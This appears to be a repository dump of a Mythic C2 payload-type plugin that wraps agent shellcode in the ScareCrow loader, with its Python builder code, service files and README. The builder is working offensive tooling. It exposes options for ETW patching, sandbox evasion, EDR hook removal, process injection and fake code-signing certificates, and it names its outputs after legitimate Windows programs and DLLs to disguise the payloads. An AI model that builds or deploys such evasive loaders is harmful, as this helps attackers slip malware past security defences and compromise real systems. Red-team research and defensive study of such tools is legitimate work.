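            description="Loader - Sets the type of process that will sideload the malicious payload. Note: Binary, Control, and DLL loaders require shellcode as input while Excel, Msiexec, and Wscript loaders require a PE file.",
            choices=["control", "binary", "dll"],
        ),
        "etw": BuildParameter(
            name="etw",
            parameter_type=BuildParameterType.ChooseOne,
            description="ETW - Enables ETW patching to prevent ETW events from being generated.",
            choices=["true", "false"],
        ),
        "console": BuildParameter(
            name="console",
            parameter_type=BuildParameterType.ChooseOne,
            description="Console (Only for Binary Payloads) - Generates verbose console information when the payload is executed. This will disable the hidden window feature.",
            choices=["true", "false"],
        ),
        "sandbox": BuildParameter(
            name="sandbox",
            parameter_type=BuildParameterType.ChooseOne,
            description="Sandbox - Enables sandbox evasion using IsDomainedJoined calls.",
            choices=["true", "false"],
        ),
        "unmodified": BuildParameter(
            name="unmodified",
            parameter_type=BuildParameterType.ChooseOne,
            description="Unmodified - (Only for DLL Payloads) When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.",
            choices=["true", "false"],
            default_value="false",
        ),
        "injection": BuildParameter(
            name="injection",
            parameter_type=BuildParameterType.String,
            required=False,
            description="Injection - Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).",
            default_value="",
        ),
        "domain": BuildParameter(
            name="domain",
            required=True,
            parameter_type=BuildParameterType.String,
            description="Domain - The domain name to use for creating a fake code signing cert.",
            default_value="www.acme.com",
        ),
    }
    c2_profiles = []

    @staticmethod
    def _is_pe(path):
        """Return True when the file at ``path`` starts with the 'MZ' DOS header.

        The loaders offered here take raw shellcode, so a PE input is rejected
        by the caller.
        """
        with open(path, "rb") as f:
            return f.read(2) == b"\x4d\x5a"

    @staticmethod
    def _expected_outputs(loader):
        """Return ``(base_names, extension)`` of the files ScareCrow may write for ``loader``.

        :raises ValueError: for a loader value outside the configured choices
            (the original code hit an UnboundLocalError in that case).
        """
        table = {
            "control": (
                ["appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"],
                ".cpl",
            ),
            "binary": (
                ["Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"],
                ".exe",
            ),
            "dll": (
                ["apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"],
                ".dll",
            ),
        }
        if loader not in table:
            raise ValueError("Unknown loader type: {}".format(loader))
        return table[loader]

    def _scarecrow_command(self, agent_build_path, working_path):
        """Assemble the shell command that builds and runs ScareCrow.

        Every path and operator-supplied value is passed through
        ``shlex.quote`` so that whitespace or shell metacharacters (including
        the backslashes a Windows path contains) reach ScareCrow verbatim
        instead of being interpreted by ``/bin/sh``.
        """
        command = "cd {}/ScareCrow/; go build; chmod +x ScareCrow; ./ScareCrow ".format(
            shlex.quote(agent_build_path)
        )
        flags = ["-I", shlex.quote(working_path), "-Loader", shlex.quote(str(self.get_parameter("loader")))]
        if self.get_parameter("etw") == "true":
            flags.append("-etw")
        if self.get_parameter("console") == "true":
            flags.append("-console")
        injection = self.get_parameter("injection")
        if injection:
            flags += ["-injection", shlex.quote(str(injection))]
        domain = self.get_parameter("domain")
        if domain:
            flags += ["-domain", shlex.quote(str(domain))]
        if self.get_parameter("sandbox") == "true":
            flags.append("-sandbox")
        if self.get_parameter("unmodified") == "true":
            flags.append("-unmodified")
        return command + " ".join(flags)

    async def build(self) -> BuildResponse:
        """Create an instance of this payload (called by Mythic).

        :return: a BuildResponse with status Success and ``payload`` set when
            one of the expected ScareCrow output files exists; otherwise status
            Error with ``build_stderr`` describing the failure.
        :raises Exception: any error during the build, re-raised with the
            collected ScareCrow stdout/stderr appended (as before).
        """
        resp = BuildResponse(status=BuildStatus.Error)
        output = ""
        agent_build_path = None
        try:
            loader = self.get_parameter("loader")
            if loader != "dll" and self.get_parameter("unmodified") == "true":
                resp.build_stderr = "Cannot use Unmodified option with a loader type other than DLL!"
                return resp

            # mkdtemp leaves the directory in place. The original used
            # TemporaryDirectory(...).name, whose directory is deleted as soon
            # as the object is garbage-collected, so copy_tree had to recreate
            # it; the directory is now removed explicitly in ``finally``.
            agent_build_path = tempfile.mkdtemp(suffix=self.uuid)
            copy_tree(self.agent_code_path, agent_build_path)
            working_path = "{}/original.exe".format(agent_build_path)
            output_path = "{}/output.exe".format(agent_build_path)

            with open(working_path, "wb") as f:
                f.write(base64.b64decode(self.wrapped_payload))
            if self._is_pe(working_path):
                resp.build_stderr = "Supplied payload is a PE instead of raw shellcode."
                return resp

            command = self._scarecrow_command(agent_build_path, working_path)
            proc = await asyncio.create_subprocess_shell(
                command,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=agent_build_path,
            )
            stdout, stderr = await proc.communicate()
            # errors="replace": tool output is not guaranteed to be UTF-8 and
            # a decode failure must not mask the real build result.
            if stdout:
                output += f"[stdout]\n{stdout.decode(errors='replace')}"
            if stderr:
                output += f"[stderr]\n{stderr.decode(errors='replace')}"

            names, extension = self._expected_outputs(loader)
            for name in names:
                output_name = name + extension
                output_path = "{}/ScareCrow/{}".format(agent_build_path, output_name)
                if os.path.exists(output_path):
                    with open(output_path, "rb") as f:
                        resp.payload = f.read()
                    resp.status = BuildStatus.Success
                    resp.build_message = "Command: " + command + "\n" + "New ScareCrow payload created! - {}".format(output_name)
                    return resp
            resp.payload = b""
            resp.build_stderr = "Failed, output: " + output + "\n Output path: " + output_path
        except Exception as e:
            raise Exception(str(e) + "\n" + output) from e
        finally:
            # Remove the scratch copy of agent_code (including the decoded
            # payload and build artifacts); the original left it behind.
            if agent_build_path is not None:
                shutil.rmtree(agent_build_path, ignore_errors=True)
        return resp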
137 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/mythic_service.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Container entry point for the payload-type service: hands control to the
# Mythic payload-type library, which starts the service and its heartbeat.
# Presumably blocks for the lifetime of the container — confirm against the library.
from mythic_payloadtype_container import mythic_service
mythic_service.start_service_and_heartbeat()
4 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/payload_service.sh:
--------------------------------------------------------------------------------
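#!/bin/bash
# Container entrypoint: run the Mythic payload-type service from /Mythic/mythic.

# Abort if the service directory is missing instead of starting python3.8
# from whatever the current working directory happens to be.
cd /Mythic/mythic || exit 1

# Make the container's Mythic package and the service directory importable.
export PYTHONPATH=/Mythic:/Mythic/mythic

python3.8 mythic_service.py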
8 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/rabbitmq_config.json:
--------------------------------------------------------------------------------
1 | {
2 | "username": "mythic_user",
3 | "password": "mythic_password",
4 | "virtual_host": "mythic_vhost",
5 | "host": "127.0.0.1",
6 | "name": "hostname",
7 | "container_files_path": "/Mythic/"
8 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ScareCrow Wrapper
2 | A wrapper payload for [Mythic](https://github.com/its-a-feature/Mythic) that wraps any agent shellcode with the [ScareCrow](https://github.com/optiv/ScareCrow) loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow.
3 |
4 | ## Usage
5 | In Mythic, go to Create Components > Create Wrapper and then select "scarecrow_wrapper". Select/input the desired configuration options, and then select the payload you would like to wrap. Once the generation is complete, go to Operational Views > Created Payloads to download the output file. The intended filename can be seen in Payload Actions > View Build Message.
6 |
7 | ## How to install an agent in this format within Mythic
8 |
9 | When it's time to test your install, or for another user to install your agent, the process is simple. Within Mythic you can run the `mythic-cli` binary to install it in one of three ways:
10 |
11 | * `sudo ./mythic-cli install github https://github.com/user/repo` to install the main branch
12 | * `sudo ./mythic-cli install github https://github.com/user/repo branchname` to install a specific branch of that repo
13 | * `sudo ./mythic-cli install folder /path/to/local/folder/cloned/from/github` to install from an already cloned down version of an agent repo
14 |
15 | Now, you might be wondering _when_ you or a user should do this to properly add your agent to their Mythic instance. There's no wrong answer here; it just depends on your preference. The three options are:
16 |
17 | * If Mythic is already up and going, you can run the install script and just direct that agent's containers to start (i.e. `sudo ./mythic-cli payload start agentName` and if that agent has its own special C2 containers, you'll need to start them too via `sudo ./mythic-cli c2 start c2profileName`).
18 | * If Mythic is already up and going but you want to minimize your steps, you can just install the agent and run `sudo ./mythic-cli mythic start`. That script will first _stop_ all of your containers, then start everything back up again. This will also bring in the new agent you just installed.
19 | * If Mythic isn't running, you can install the agent and just run `sudo ./mythic-cli mythic start`.
20 |
21 |
--------------------------------------------------------------------------------
/agent_icons/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/agent_icons/.keep
--------------------------------------------------------------------------------
/config.json:
--------------------------------------------------------------------------------
1 | {
2 | "exclude_payload_type": false,
3 | "exclude_c2_profiles": false,
4 | "exclude_documentation_payload": false,
5 | "exclude_documentation_c2": false,
6 | "exclude_agent_icons": false
7 | }
8 |
--------------------------------------------------------------------------------
/documentation-c2/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-c2/.keep
--------------------------------------------------------------------------------
/documentation-payload/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-payload/.keep
--------------------------------------------------------------------------------
/documentation-wrapper/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-wrapper/.keep
--------------------------------------------------------------------------------